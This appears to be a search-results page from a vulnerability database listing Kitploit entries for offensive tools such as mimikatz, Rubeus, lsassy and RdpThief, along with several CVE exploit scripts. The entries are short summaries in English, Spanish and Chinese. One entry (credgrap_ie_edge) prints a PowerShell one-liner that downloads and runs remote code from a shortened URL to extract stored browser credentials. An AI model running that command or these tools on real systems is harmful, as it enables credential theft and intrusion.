Lucene search
+L

169 matches found

Kitploit
Kitploit
added 2026/09/18 8:59 a.m.7 views

RdpThief

RdpThief RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process, will perform API hooking, extract the clear-text credentials and save them to a file. An aggressor script accompanies it, which is responsible for managing the state, monitoring for new processes and...

5.7AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/18 7:45 a.m.17 views

Seth

Seth Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests,...

6.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/18 7:21 a.m.12 views

BlueFish

BlueFish BlueFish is a Python-based automation tool designed to simplify the analysis of PCAP Packet Capture files. It leverages the power of Wireshark's command-line tool, tshark, to extract valuable information from network captures. With BlueFish, you can quickly identify potential login...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/18 6:43 a.m.10 views

ThunderCloud

ThunderCloud Cloud Exploit Framework Usage root@kitploit: python3 tc.py -h | | | | | / | | | | | | | | | | | | | | | | | | | ' | | | | ' \ / |/ \ '| | | |/ | | | |/ | | | | | | | || | | | | | | / | | || | | || | | | / || ||,|| ||,||| ||/ ,|,| usage: tc.py -h -ce COGNITOENDPOINT -reg...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/18 6:03 a.m.13 views

credgrap_ie_edge

credgrapieedge Content: Extract stored credentials from Internet Explorer and Edge Author: Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 04/2018 Usage powershell -nop -exec bypass -c "IEX New-Object Net.WebClient.DownloadString'http://bit.ly/2K75g15'" Recommendation Powershell...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/18 4:23 a.m.14 views

Rubeus

Rubeus Rubeus is a C toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project CC BY-NC-SA 4.0 license and Vincent LE TOUX's MakeMeEnterpriseAdmin project GPL v3.0 license. Full credit goes to Benjamin and Vincent for working out the hard component...

5.9AI score
SaveExploits0References11
Kitploit
Kitploit
added 2026/09/18 4:09 a.m.11 views

gMSA_Dumper

gMSADumper Lee cualquier blob de contraseña de gMSA al que el usuario pueda acceder y analiza los valores. root@kitploit: gMSADumper.py -h...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/18 3:17 a.m.13 views

lsassy

lsassy Python tool to remotely extract credentials on a set of hosts. This blog post explains how it works. This tool uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials...

5.9AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/18 2:55 a.m.10 views

mimipenguin

MimiPenguin 2.0 一种用于从当前 Linux 桌面用户转储登录密码的工具。改编自流行 Windows 工具 mimikatz 背后的思路。此漏洞被分配了 CVE-2018-20781 https://vulners.com/cve/CVE-2018-20781。有趣的是,它在 GNOME Keyring 3.27.2 之后仍未修复,并且在 3.28.0.2-1ubuntu1.18.04.1 中仍然有效。 详细信息 通过转储进程并提取包含明文密码概率较高的行,利用内存中的明文凭据。将尝试通过检查 /etc/shadow...

7.8CVSS7.6AI score0.01483EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/18 2:37 a.m.13 views

NtDumpBOF

NtDumpBOF Adaptación BOF de la herramienta https://github.com/ricardojoserf/NativeDump escrita por @ricardojoserf. Importa NtDump.cna y ejecuta: root@kitploit: ntdump El archivo minidump se creará en memoria y se descargará mediante CALLBACKFILE y CALLBACKFILEWRITE. Una vez descargado, el archivo...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/18 2:24 a.m.7 views

PyHook

PyHook PyHook is the python implementation of my SharpHook project, It uses various API hooks in order to give us the desired credentials. PyHook Uses frida to inject it's dependencies into the target process Supported Processes...

5.8AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/18 12:16 a.m.9 views

CVE-2024-1698-NotificationX-WordPress-Plugin-SQL-Injection-to-Admin-Credential-Extraction

CVE-2024-1698 – Inyección SQL en el plugin NotificationX de WordPress Ciega basada en tiempo Inyección SQL ciega basada en tiempo sin autenticación → Extrae el nombre de usuario y el hash de la contraseña de administrador de WordPress. 🧠 Resumen de la vulnerabilidad Las versiones de NotificationX...

9.8CVSS8.4AI score0.77585EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/17 11:03 p.m.14 views

zynos-attacker

IMPORTANTE : Estos scripts están destinados únicamente a fines educativos. Descripción : Con estos scripts puedes atacar routers ZynOS y modificar/extraer cualquier cosa que desees en el router objetivo, desde extraer el nombre de usuario y contraseña del ISP hasta inyectar IPs de servidores DNS...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 10:56 p.m.10 views

go-secdump

go-secdump 描述 go-secdump 是一个用于从 SAM 注册表配置单元远程提取哈希值以及从 SECURITY 配置单元提取 LSA 机密和缓存的哈希值的工具,无需远程代理,也无需接触磁盘。 该工具基于 go-smb 库构建,并利用它与 Windows 远程注册表通信,直接从内存中检索注册表键。 该工具的构建是为了学习经验,并作为概念验证,证明应该能够远程从 SAM 配置单元检索 NT 哈希值、LSA 机密以及域缓存凭据,而无需先将注册表配置单元保存到磁盘,然后再在本地解析它们。 需要克服的主要问题是,SAM 和 SECURITY 配置单元仅可由 NT...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/17 10:37 p.m.8 views

mimikittenz

mimikittenz mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory in order to extract plain-text passwords from various target processes. mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 9:10 p.m.14 views

mimikatz

mimikatz mimikatz 是我为了学习 C 语言并对 Windows 安全进行一些实验而制作的一款工具。 如今它以从内存中提取明文密码、哈希、PIN 码和 Kerberos 票据而闻名。mimikatz 还可以执行哈希传递(pass-the-hash)、票据传递(pass-the-ticket)或构建黄金票据(Golden tickets)。 root@kitploit: .. mimikatz 2.0 alpha x86 release "Kiwi en C" Apr 6 2014 22:02:03 . ^ . / \ / \ / Benjamin DELPY...

6AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/17 9:07 p.m.9 views

wp-mail-masta-exploit

WordPress Plugin Mail Masta 1.0 - Exploit CVE-2016-10956 Este script explota la vulnerabilidad CVE-2016-10956 en el plugin Mail Masta 1.0 de WordPress para extraer credenciales de wp-config.php. Cómo usar 1. Clona el repositorio: root@kitploit: git clone...

7.5CVSS7.4AI score0.10582EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/17 9:05 p.m.5 views

SharePoint-ToolShell-CVE-2025-53770-Incident-Analysis

SharePoint ToolShell CVE-2025-53770 – Análisis de Incidentes Resumen Este proyecto documenta la investigación de un intento de explotación real dirigido a un servidor SharePoint utilizando la vulnerabilidad ToolShell CVE-2025-53770. El ataque demuestra una cadena de explotación completa que inclu...

9.8CVSS8.3AI score0.99998EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/17 8:34 p.m.13 views

VeeamDumper-BOF

Veeam Dumper BOF Una BOF de extracción de credenciales para Veeam Backup and Replication y Veeam One por Stephen Munro y Logan Kroeger de @MWRCyberSec. La BOF debe ejecutarse en un beacon de administrador en un servidor de Veeam One o Veeam Backup and Replication y es compatible con Cobalt Strike...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/17 8:28 p.m.7 views

CMS-Made-Simple-2.2.9-Unauthenticated-SQL-Injection-Exploit-CVE-2019-9053-

CMS Made Simple = 2.2.9 SQL注入漏洞利用 CVE-2019-9053 📌 描述 该漏洞利用工具针对CMS Made Simple = 2.2.9(CVE-2019-9053)中的未授权SQL注入漏洞。攻击者可以通过基于时间的盲SQL注入提取敏感信息,如用户名、电子邮件、密码哈希和盐值。 此外,该利用工具还支持使用提供的字典进行密码破解。 🚀 特性 未授权SQL注入 提取用户名、电子邮件和密码哈希 获取密码盐值 支持通过字典破解密码(可选) 使用基于时间的盲SQL注入 🔧 安装 克隆仓库: root@kitploit: git clone...

8.1CVSS7.8AI score0.68581EPSS
SaveExploits38References1
Rows per page
Query Builder